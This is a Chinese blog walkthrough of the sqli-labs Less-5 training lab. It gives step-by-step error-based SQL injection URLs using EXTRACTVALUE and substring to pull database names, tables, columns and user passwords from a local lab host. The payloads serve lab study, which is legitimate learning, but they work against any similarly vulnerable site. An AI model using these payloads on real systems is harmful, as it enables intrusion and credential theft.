sqli-labs靶场第五关less-5

于 2024-10-02 08:45:00 发布
阅读量1.0k 收藏 24
点赞数 14
分类专栏: sqli-labs靶场 文章标签: less 数据库 前端 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanggonghanfei/article/details/142677134
版权

sqli-labs less-5

在这里插入图片描述

本次测试由虚拟机搭建靶场,主机浏览器中基于hackbar插件进行测试

1、确定注入点及注入类型

输入:

http://192.168.128.3/sq/Less-5/?id=1
http://192.168.128.3/sq/Less-5/?id=2

在这里插入图片描述
发现页面回显都一致,
输入

http://192.168.128.3/sq/Less-5/?id=1’

页面回显报错
在这里插入图片描述
从报错判断多了个 ,确定闭合为*‘ ’* ,

2、确定列数

输入

http://192.168.128.3/sq/Less-5/?id=1’ order by 5–+
http://192.168.128.3/sq/Less-5/?id=1’ order by 4–+
http://192.168.128.3/sq/Less-5/?id=1’ order by 3–+

发现5,4都报错,3的时候页面回显与之前一致,确定由三列

3、确定回显位

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,2,3–+

在这里插入图片描述
无回显,结合前面出现的单引号与确定列数页面出现报错可判断出,此关可使用报错注入
本次我使用 EXTRACTVALUE() 函数进行报错注入。
函数原型

EXTRACTVALUE(xml_data, xpath_expression)

extractvalue()函数原理可参考我写的另外一篇文章
报错注入函数基础知识详解
或者另外一位博主讲的:sql注入之报错注入
使用报错注入确定回显

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,(select database()))),3–+

  • 0x7e转码后为 ~ ,加入~目的是为了让后面的路径故意报错

使用了extractvalue函数,将xml数据设置为1,xpath_expression部分设置为concat(0x7e,(select database())
此时的xpath_expression为“~数据库名”,由于1中并没有“~数据库名”因此会产生报错,可以从报错结果中看到我们想要的数据库名
在这里插入图片描述
故此查询到数据库名

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,(select version()))),3–+

  • 版本名

在这里插入图片描述

3、爆出所有数据库名

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata))),3–+

在这里插入图片描述
**由此爆出了数据库名,但是由于此报错注入一次返回的字符只能由32位,这时我们可以借助substring函数
例如:select substring(123456,1,3);
输出 123
于是我们可以使用

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(schema_name) from information_schema.schemata)),1,30))),3–+

来显示从第一个字符开始的前三十个,然后使用

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(schema_name) from information_schema.schemata)),30,30))),3–+

发现还没有显示完全,接着

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(schema_name) from information_schema.schemata)),60,30))),3–+

显示完整,三次报错显示结果如下:
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
得到完整的数据库

4、爆出security的所有表名

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(table_name) from information_schema.tables where table_schema=database())),1,30))),3–+

在这里插入图片描述

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(table_name) from information_schema.tables where table_schema=database())),30,30))),3–+

在这里插入图片描述
得到想要的表名 users

5、爆出列名

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’)),1,30))),3–+

在这里插入图片描述

6、爆出数据

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(username,’ ',password) from security.users)),1,30))),3–+

在这里插入图片描述

http://192.168.128.3/sq/Less-5/?id=1’ union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(username,’ ',password) from security.users)),30,30))),3–+

在这里插入图片描述
剩下数据显示出来与上面同理
至此,大功告成

子非鱼999
关注
专栏目录
sqli-labs Less-5 (报错注入)
A9874564的博客
02-25 4284
在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要报错注入。 1.less 5 正常情况,我们构造闭合,发现没有问题 利用前几的思路,发现无论怎么操作都是You are in......,这个时候一般的思路就行不通。 发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试报错注入。 2.报错注入 2.1 extractvalue报错 示例: and extractvalue(null,concat(0x7e,(sql_inje.
sqli-labs Less-5(布尔盲注)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
01-31 670
前几篇sql注入文章 sqli-labs Less-1(联合注入、字符型注入) sqli-labs Less-2(联合注入、整形型注入) sqli-labs Less-3(联合注入、字符型注入) sqli-labs Less-4(联合注入、字符型注入) sqli-labs Less-5(利用extractvalue进行报错注入) sqli-labs Less-5(双注入) 布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利
sqli-labs靶场自动化利用工具——第5
最新发布
转瞬都有的博客
09-11 523
熟悉并掌握sqli-labs靶场的小伙伴可以看过来了,这里是针对每一sqli-labs靶场的自动化利用工具,本章节将讲述第5的POC。注意我的Sqli-Labs靶场搭建在我的本机。
SQLi-LABS Less-5
m0_64898960的博客
04-12 1721
SQLi-LABS Less-5
sqli-labs less-5
阿刁〇的博客
03-30 379
文章目录sqli-labs less-5* 判断注入* 判断列数* 查询详细信息 sqli-labs less-5 第五和前面的几不同 * 判断注入 输入?id=1 回显信息为You are in…… 判断注入类型 输入?id=1' 根据报错信息可知,注入类型为字符型 输入?id=1' --+ 回显正常 由此可知,闭合方式为’) * 判断列数 输入?id=1') order by 3 --+ 回显正常 输入?id=1') order by 4 --+ 回显错误 故字段数为3,有3列 *
#sqli-labs less5
qq_45106794的博客
10-18 258
#sqli-labs less5 从含义上讲,count(1) 与 count() 都表示对全部数据行的查询。count() 包括了所有的列,相当于行数,在统计结果的时候,不会忽略列值为NULL ;count(1) 用1代表代码行,在统计结果的时候,不会忽略列值为NULL 。 一般情况下SQL的报错信息是不会显示在页面中的 只有在php.ini 进行如下配置 display_errors=On ...
Sqli-labs靶场第5详解[Sqli-labs-less-5]
m0_73615178的博客
02-20 1837
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库字-为后期猜解指定数据库下的表,列做准备-database()sql注入——报错注入(Error-based)
sqli-labs靶场练习笔记
11-09
- **第5:布尔盲注实战** - **特点**:同第3,但使用的是单引号布尔盲注。 - **实现思路**:通过比较页面响应时间来判断数据库称、表等信息。 - **示例**:使用`and`语句结合`if`判断数据库称首字母的...
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2000
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1536
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第12详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 804
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--出当前数据库称及当前用户
Sqli-labs靶场第16详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 824
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件出当前主机称。
sqli-labs(less5)
m0_68980215的博客
07-08 332
sql-lab lesson5
sqli-labs靶场第五
gou1791241251的博客
12-20 4688
第五与前面几都有所不同,话不多说,我们传入id=1进去看看吧! 此时页面回显信息为you are in… 第一步:判断注入类型,字符型还是数字型 从报错信息不难看出注入类型为字符型,且为单引号闭合 此步证实了单引号闭合 第二步:判断字段数(使用order by) order by 3时页面正常,order by 4时页面异常,说明有三个字段 页面有布尔类型状态,所以用布尔盲注,页面没有回显不能用联合查询,页面没有报错信息不能用报错注入。 使用length函数来判断数据库长度是否为1,由图可
sqli-labs 第五
m0_63711447的博客
04-01 4608
第五可以用很多种方法来做,报错型注入,二次查询注入等,这里用布尔盲注手工注入的方法来做 Less -5 1、输入?id=1,显示you are in 将1改为3,5等数字,仍然得相同结果,改为100,发现没有回显,由此可知正确的情况下会返回you are in,错误的情况下没有返回, 输入?id=1',出现报错信息,由此判断存在注入漏洞 2、使用order by 语句进行查列,order by 3的时候正常回显,order by 4无回显,说明有三列 3、对于这题不能使用联合查询,无.
基于Sqli-Labs靶场SQL注入-第五(重点讲双查询注入)
Joker
11-19 4251
双查询是指两个查询语句的嵌套,也就是一个select语句中在去套一个select语句,然后利用group by 语句和floor函数的结合去报错,再将我们需要的信息显示到报错信息中。
sqli-labs---第五
2201_75556700的博客
05-22 744
7、查询email_id中的值(这里就拿到了用户email信息)根据页面的提示可以知道这是单引号'的闭合方式,并且是报错注入。5、查字段USER中的信息,这里查不出来,那就换一张表。id=1(没有正常显示)提示了一串字符。6、查询emails 这张表中的字段信息。3、查询表(看到敏感表users)4、查询users表中字段的信息。id=1'(出现了错误提示)
sqli-labs-----第五
wyzhxhn的博客
11-06 906
单引号字符型updatexml报错注入
[网络安全]sqli-labs Less-5 解题详析
等风来
05-02 2246
以上为[网络安全]sqli-labs Less-5 解题详析,后续将分享[网络安全]sqli-labs Less-6 解题详析[网络安全]SQL注入原理及常见攻击方法简析我是秋说,我们下次见。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值